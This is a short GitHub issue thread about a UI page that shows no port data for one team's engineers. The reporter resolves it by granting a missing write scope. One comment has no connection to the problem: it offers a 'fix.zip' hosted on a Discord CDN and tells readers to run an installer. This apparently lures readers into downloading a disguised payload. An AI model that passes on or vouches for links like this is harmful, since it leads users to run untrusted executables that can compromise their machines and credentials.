### ISSUE TITLE
[BUG] Help troubleshooting why NMS GUI not working for TEN

### ISSUE THREAD

**Issue by wouter1975** [workfloworchestrator/orchestrator-ui-library#1396]
The page Chassis / <uuid>  ports tab is not resulting in any data for TEN engineers, probably some oidc settings is limiting their view.

Max is experiencing the following error:

![Image](https://github.com/user-attachments/assets/b86d212d-7715-41c1-b08c-3de9b841a547)

**Comment by SNWCreations** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by wouter1975** [comment]
Add ims write scope to ten
